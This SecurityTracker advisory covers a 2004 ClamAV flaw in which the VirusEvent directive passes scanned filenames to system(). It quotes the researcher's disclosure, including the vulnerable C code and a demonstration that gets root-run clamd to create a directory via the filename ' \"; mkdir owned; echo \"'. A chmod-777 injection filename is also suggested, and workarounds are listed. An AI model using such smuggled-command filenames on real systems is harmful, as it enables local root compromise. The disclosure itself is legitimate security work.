SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com





Category:   Application (Security)  >   Clam AntiVirus Vendors:   clamav.sourceforge.net
Clam AntiVirus Unsafe VirusEvent Directive May Let Local Users Gain Root Privileges
SecurityTracker Alert ID:  1009615
SecurityTracker URL:  http://securitytracker.com/id/1009615
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Apr 1 2004
Impact:   Execution of arbitrary code via local system, Root access via local system


Description:   A vulnerability was reported in Clam AntiVirus in the VirusEvent directive. A local user can execute arbitrary commands on the target system.

l0om reported that if a user has configured a VirusEvent directive in the 'clamav.conf' file, the system may be vulnerable. A local user can create a specially crafted filename containing shell commands and a virus string. When clamd detects the virus, the virusaction() function will reportedly pass the filename to a system() call. As a result, the commands will be executed by clamd, typically with root privileges.
Impact:   A local user can cause operating system commans to be executed by clamd with root privileges.
Solution:   No solution was available at the time of this entry.

The author of the report indicates that, as a workaround, you can aovid using the VirusEvent directive or avoid using the "%f" string in the VirusEvent directive.
Vendor URL:  www.clamav.net/ (Links to External Site)
Cause:   Input validation error
Underlying OS:   Linux (Any), UNIX (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
May 11 2004 (Gentoo Issues Fix) Clam AntiVirus Unsafe VirusEvent Directive May Let Local Users Gain Root Privileges   (Thierry Carrez <koon@gentoo.org>)
Gentoo has released a fix.


 Source Message Contents
Date:  30 Mar 2004 12:34:18 -0000
Subject:  clamd - NEVER use "%f" in your "VirusEvent"




date: 30 March 2004
product: clam antivirus
author: l0om  -  l0om[at]excluded.org  -  www.excluded.org

#####################################################################
clam antivirus is a antivirus program (which works very well). it comes with a lot of features and its easy to handle.
for normal you start it from the command line on demand but if you use the the dazuko module you can also scan in realtime. the program
 runs 
on standard as root but you can drop its privileges if you want to.

in the clamav.conf we can find the "VirusEvent" direction (which is on default disabled):


# Execute a command when virus is found. In the command string %v and %f will
# be replaced by the virus name and the infected file name respectively.
#
# SECURITY WARNING: Make sure the virus event command cannot be exploited,
#                   eg. by using some special file name when %f is used.
#                   Always use a full path to the command.
#                   Never delete/move files with this directive !
# VirusEvent /usr/bin/send_sms 1214131 "VIRUS DETECTED: %f: %v"

"Make sure the virus event command cannot be exploited,
eg. by using some special file name when %f is used."
 
this is not enough. they should del this "%f" feature for security reasons because in my opinion, for now, you nearly
cant prevent the "%f" thing from breaking out of your VirusEvent and do whatever the attacker likes too.

#####################################################################
void virusaction(const char *filename, const char *virname, const struct cfgstruct *copt)
{
 [...]
    buffer = (char *) mcalloc(strlen(cmd) + strlen(filename) + strlen(virname) + 10, sizeof(char));

    if((pt = strstr(cmd, "%f"))) {
        *pt = 0; pt += 2;
        strcpy(buffer, cmd);            <----
        strcat(buffer, filename);       <----
    if((pt = strstr(cmd, "%f"))) {
        *pt = 0; pt += 2;
        strcpy(buffer, cmd);            <----
        strcat(buffer, filename);       <----
        strcat(buffer, pt);             <----
        free(cmd);
        cmd = strdup(buffer);
    }

    if((pt = strstr(cmd, "%v"))) {
        *pt = 0; pt += 2;
        strcpy(buffer, cmd);
        strcat(buffer, virname);
        strcat(buffer, pt);
        free(cmd);
        cmd = strdup(buffer);
    }

    free(buffer);

    /* WARNING: this is uninterruptable ! */
    system(cmd);   <------------------------------------------
    free(cmd);
}
#####################################################################

as we can see in the source code there is no filter for shell characters like ";" or " in the program.
therefor an attacker may take a look at your VirusEvent(as your clamav.conf is world-readable) and create a file named  " ; chmod
 777 etc" for example and
put some virus in it. as we can see above the clamd will execute the buffer. The attacker cant use pathes like "/" but he has what
 it takes to get root or kill
the system.

the commands will be executed by the clamd on "/" as the process makes a chdir("/").

#####################################################################
example:

l0om:~> ls -l /usr/local/etc/clamav.conf
-rw-r--r--    1 root     root         6863 2004-03-27 11:27 /usr/local/etc/clamav.conf

l0om:~> cat /usr/local/etc/clamav.conf
[...]
# Execute a command when virus is found. In the command string %v and %f will
# be replaced by the virus name and the infected file name respectively.
#
# SECURITY WARNING: Make sure the virus event command cannot be exploited,
#                   eg. by using some special file name when %f is used.
#                   Always use a full path to the command.
#                   Never delete/move files with this directive !
VirusEvent /bin/echo "Virus: %f: %v" | /usr/bin/mail -s "VIRUS ALERT" admin@network.net

# Run as selected user (clamd must be started by root).
# By default it doesn't drop privileges.
#User clamav
[...]

l0om:~> cat >" \"; mkdir owned; echo \""
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

l0om:~> ls
 "; mkdir owned; echo "  XXX.blow_balls_4_real.mpeg   XxX.admin_and_amanda_backup_deamon_having_fun.avi

# on realtime scanning the file will be scaned when we close it or we open it for reading.
# [...whatever- on next virus scan]

l0om:~> ls -ld /owned
drwxrwxrwx    2 root     root           48 2004-03-30 11:29 owned
#####################################################################

workaround:
- dont use the VirusEvent
- dont use the "%f" in the VirusEvent(!)
- start events with your own script parsing the clamd´s log file manual
######################################################################

have phun everybody!
   someone on NoFX concert or on the deconstruction-tour in köln?  PARTY ON!

-- l0om
-- www.excluded.org


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us

Copyright 2012, SecurityGlobal.net LLC